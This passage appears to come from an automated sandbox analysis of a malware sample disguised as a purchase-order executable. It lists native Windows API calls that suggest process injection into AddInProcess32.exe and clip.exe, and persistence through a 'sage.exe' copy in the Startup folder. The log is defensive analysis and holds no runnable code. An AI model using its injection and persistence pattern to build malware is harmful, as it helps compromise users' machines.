                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01554260 NtSetContextThread,18_2_01554260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01554570 NtSuspendThread,18_2_01554570
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015529D0 NtWaitForSingleObject,18_2_015529D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015529F0 NtReadFile,18_2_015529F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01552B10 NtAllocateVirtualMemory,18_2_01552B10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01552B00 NtQueryValueKey,18_2_01552B00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01552B20 NtQueryInformationProcess,18_2_01552B20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01552BE0 NtQueryVirtualMemory,18_2_01552BE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01552B80 NtCreateKey,18_2_01552B80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01552A10 NtWriteFile,18_2_01552A10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01552AC0 NtEnumerateValueKey,18_2_01552AC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01552AA0 NtQueryInformationFile,18_2_01552AA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01552D50 NtWriteVirtualMemory,18_2_01552D50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01552DC0 NtAdjustPrivilegesToken,18_2_01552DC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01552DA0 NtReadVirtualMemory,18_2_01552DA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01552C50 NtUnmapViewOfSection,18_2_01552C50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01552C10 NtOpenProcess,18_2_01552C10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01552C30 NtMapViewOfSection,18_2_01552C30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01552C20 NtSetInformationFile,18_2_01552C20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01552CD0 NtEnumerateKey,18_2_01552CD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01552CF0 NtDelayExecution,18_2_01552CF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01552F00 NtCreateFile,18_2_01552F00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01552F30 NtOpenDirectoryObject,18_2_01552F30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01552FB0 NtSetValueKey,18_2_01552FB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01552E50 NtCreateSection,18_2_01552E50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01552E00 NtQueueApcThread,18_2_01552E00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01552ED0 NtResumeThread,18_2_01552ED0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01552EC0 NtQuerySection,18_2_01552EC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01552E80 NtCreateProcessEx,18_2_01552E80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015538D0 NtGetContextThread,18_2_015538D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01553C30 NtOpenProcessToken,18_2_01553C30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01553C90 NtOpenThread,18_2_01553C90
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E14570 NtSuspendThread,LdrInitializeThunk,24_2_04E14570
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E14260 NtSetContextThread,LdrInitializeThunk,24_2_04E14260
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E12CF0 NtDelayExecution,LdrInitializeThunk,24_2_04E12CF0
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E12C50 NtUnmapViewOfSection,LdrInitializeThunk,24_2_04E12C50
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E12C30 NtMapViewOfSection,LdrInitializeThunk,24_2_04E12C30
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E12DA0 NtReadVirtualMemory,LdrInitializeThunk,24_2_04E12DA0
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E12D10 NtQuerySystemInformation,LdrInitializeThunk,24_2_04E12D10
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E12ED0 NtResumeThread,LdrInitializeThunk,24_2_04E12ED0
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E12E50 NtCreateSection,LdrInitializeThunk,24_2_04E12E50
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E12E00 NtQueueApcThread,LdrInitializeThunk,24_2_04E12E00
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E12F00 NtCreateFile,LdrInitializeThunk,24_2_04E12F00
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E129F0 NtReadFile,LdrInitializeThunk,24_2_04E129F0
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E12AC0 NtEnumerateValueKey,LdrInitializeThunk,24_2_04E12AC0
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E12A80 NtClose,LdrInitializeThunk,24_2_04E12A80
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E12A10 NtWriteFile,LdrInitializeThunk,24_2_04E12A10
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E12BC0 NtQueryInformationToken,LdrInitializeThunk,24_2_04E12BC0
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E12B80 NtCreateKey,LdrInitializeThunk,24_2_04E12B80
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E12B90 NtFreeVirtualMemory,LdrInitializeThunk,24_2_04E12B90
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E12B00 NtQueryValueKey,LdrInitializeThunk,24_2_04E12B00
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E12B10 NtAllocateVirtualMemory,LdrInitializeThunk,24_2_04E12B10
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E134E0 NtCreateMutant,LdrInitializeThunk,24_2_04E134E0
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E138D0 NtGetContextThread,LdrInitializeThunk,24_2_04E138D0
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E12CD0 NtEnumerateKey,24_2_04E12CD0
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E12C20 NtSetInformationFile,24_2_04E12C20
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E12C10 NtOpenProcess,24_2_04E12C10
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E12DC0 NtAdjustPrivilegesToken,24_2_04E12DC0
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E12D50 NtWriteVirtualMemory,24_2_04E12D50
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E12EC0 NtQuerySection,24_2_04E12EC0
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E12EB0 NtProtectVirtualMemory,24_2_04E12EB0
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E12E80 NtCreateProcessEx,24_2_04E12E80
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E12FB0 NtSetValueKey,24_2_04E12FB0
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E12F30 NtOpenDirectoryObject,24_2_04E12F30
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E129D0 NtWaitForSingleObject,24_2_04E129D0
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E12AA0 NtQueryInformationFile,24_2_04E12AA0
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E12BE0 NtQueryVirtualMemory,24_2_04E12BE0
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E12B20 NtQueryInformationProcess,24_2_04E12B20
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E13C90 NtOpenThread,24_2_04E13C90
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E13C30 NtOpenProcessToken,24_2_04E13C30
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_02E28A00 NtCreateFile,24_2_02E28A00
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_02E28B70 NtReadFile,24_2_02E28B70
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_02E28E80 NtAllocateVirtualMemory,24_2_02E28E80
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_02E28C70 NtDeleteFile,24_2_02E28C70
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_02E28D10 NtClose,24_2_02E28D10
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_06F630E0 CreateProcessAsUserW,14_2_06F630E0
                Source: C:\Users\user\Desktop\PO# 81136575.exeCode function: 0_2_031370580_2_03137058
                Source: C:\Users\user\Desktop\PO# 81136575.exeCode function: 0_2_031365880_2_03136588
                Source: C:\Users\user\Desktop\PO# 81136575.exeCode function: 0_2_031328B80_2_031328B8
                Source: C:\Users\user\Desktop\PO# 81136575.exeCode function: 0_2_072714080_2_07271408
                Source: C:\Users\user\Desktop\PO# 81136575.exeCode function: 0_2_072E00400_2_072E0040
                Source: C:\Users\user\Desktop\PO# 81136575.exeCode function: 0_2_072E00060_2_072E0006
                Source: C:\Users\user\Desktop\PO# 81136575.exeCode function: 0_2_072EF2B00_2_072EF2B0
                Source: C:\Users\user\Desktop\PO# 81136575.exeCode function: 0_2_072E68F00_2_072E68F0
                Source: C:\Users\user\Desktop\PO# 81136575.exeCode function: 0_2_072EF2C00_2_072EF2C0
                Source: C:\Users\user\Desktop\PO# 81136575.exeCode function: 0_2_077BA7800_2_077BA780
                Source: C:\Users\user\Desktop\PO# 81136575.exeCode function: 0_2_077B00400_2_077B0040
                Source: C:\Users\user\Desktop\PO# 81136575.exeCode function: 0_2_077BCA9A0_2_077BCA9A
                Source: C:\Users\user\Desktop\PO# 81136575.exeCode function: 0_2_077BA6BD0_2_077BA6BD
                Source: C:\Users\user\Desktop\PO# 81136575.exeCode function: 0_2_077B001F0_2_077B001F
                Source: C:\Users\user\Desktop\PO# 81136575.exeCode function: 0_2_072713980_2_07271398
                Source: C:\Users\user\Desktop\PO# 81136575.exeCode function: 0_2_072713F80_2_072713F8
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_02A4705814_2_02A47058
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_02A4658814_2_02A46588
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_02A428B814_2_02A428B8
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_02A46A7014_2_02A46A70
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_06C068F014_2_06C068F0
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_06C0004014_2_06C00040
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_06C0C53014_2_06C0C530
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_06C0000714_2_06C00007
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_06C0C52214_2_06C0C522
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_06F152C814_2_06F152C8
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_06F1DA3814_2_06F1DA38
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_06F123D014_2_06F123D0
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_06F1BB6014_2_06F1BB60
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_06F1407814_2_06F14078
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_06F1346814_2_06F13468
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_06F1004014_2_06F10040
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_06F1883014_2_06F18830
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_06F1E19814_2_06F1E198
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_06F1616814_2_06F16168
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_06F1490014_2_06F14900
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_06F152B814_2_06F152B8
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_06F1868814_2_06F18688
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_06F1867814_2_06F18678
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_06F17E3014_2_06F17E30
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_06F17E2014_2_06F17E20
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_06F193E014_2_06F193E0
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_06F123C014_2_06F123C0
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_06F13FBF14_2_06F13FBF
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_06F1937214_2_06F19372
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_06F1CB7814_2_06F1CB78
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_06F17E3014_2_06F17E30
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_06F17B3014_2_06F17B30
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_06F17B2114_2_06F17B21
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_06F148F014_2_06F148F0
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_06F1608814_2_06F16088
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_06F1487014_2_06F14870
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_06F1705014_2_06F17050
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_06F1345914_2_06F13459
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_06F1704014_2_06F17040
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_06F1882014_2_06F18820
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_06F1841014_2_06F18410
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_06F1840014_2_06F18400
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_06F181D814_2_06F181D8
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_06F181C914_2_06F181C9
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_06F1612D14_2_06F1612D
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_06F6366014_2_06F63660
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_06F61FE014_2_06F61FE0
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_06F6671814_2_06F66718
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_06F6396814_2_06F63968
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_06F6365214_2_06F63652
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_06F6123814_2_06F61238
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_06F6122A14_2_06F6122A
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_06F63FF114_2_06F63FF1
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_06F61FA114_2_06F61FA1
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_06F6004014_2_06F60040
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_06F6141714_2_06F61417
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_06F6000714_2_06F60007
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_06F6400014_2_06F64000
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_06F619A014_2_06F619A0
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_06F6199014_2_06F61990
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_06F6395814_2_06F63958
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_070D004014_2_070D0040
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_070DEB1A14_2_070DEB1A
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_070DEB2014_2_070DEB20
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_0FCC8D8014_2_0FCC8D80
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_0FCA855814_2_0FCA8558
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_0FCA838014_2_0FCA8380
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_0FCAA30014_2_0FCAA300
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_0FC9EA8C14_2_0FC9EA8C
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_0FCB0A1014_2_0FCB0A10
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_0FCAF18014_2_0FCAF180
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_0FCAA0E014_2_0FCAA0E0
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_0FCB283014_2_0FCB2830
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 17_2_012E705817_2_012E7058
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 17_2_012E658817_2_012E6588
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 17_2_012E28B817_2_012E28B8
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 17_2_012E6A7017_2_012E6A70
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 17_2_0710004017_2_07100040
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 17_2_0710EB1A17_2_0710EB1A
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 17_2_0743C53017_2_0743C530
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 17_2_0743004017_2_07430040
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 17_2_0743C52217_2_0743C522
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 17_2_0743000617_2_07430006
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 17_2_074368F017_2_074368F0
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 17_2_075423C017_2_075423C0
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 17_2_075452B817_2_075452B8
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 17_2_0754D57817_2_0754D578
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 17_2_0754616817_2_07546168
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 17_2_0754345917_2_07543459
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 17_2_0754004017_2_07540040
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 17_2_0754487017_2_07544870
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 17_2_0754407817_2_07544078
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 17_2_0754882017_2_07548820
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 17_2_0754937217_2_07549372
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 17_2_0754CB7817_2_0754CB78
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 17_2_07547B3017_2_07547B30
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 17_2_07547B2217_2_07547B22
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 17_2_07543FBF17_2_07543FBF
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 17_2_07546E7817_2_07546E78
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 17_2_07547E2017_2_07547E20
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 17_2_0754868617_2_07548686
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 17_2_0754868817_2_07548688
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 17_2_0754691017_2_07546910
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 17_2_0754612D17_2_0754612D
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 17_2_075481D817_2_075481D8
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 17_2_075481C917_2_075481C9
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 17_2_0754705017_2_07547050
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 17_2_0754704017_2_07547040
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 17_2_0754841017_2_07548410
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 17_2_0754840017_2_07548400
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 17_2_075448F017_2_075448F0
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 17_2_0754608817_2_07546088
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 17_2_0CDE395817_2_0CDE3958
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 17_2_0CDE366017_2_0CDE3660
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 17_2_0CDE1FA117_2_0CDE1FA1
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 17_2_0CDE671817_2_0CDE6718
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 17_2_0CDE004017_2_0CDE0040
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 17_2_0CDE141717_2_0CDE1417
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 17_2_0CDE000717_2_0CDE0007
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 17_2_0CDE11DA17_2_0CDE11DA
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 17_2_0CDE199017_2_0CDE1990
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 17_2_0CDE19A017_2_0CDE19A0
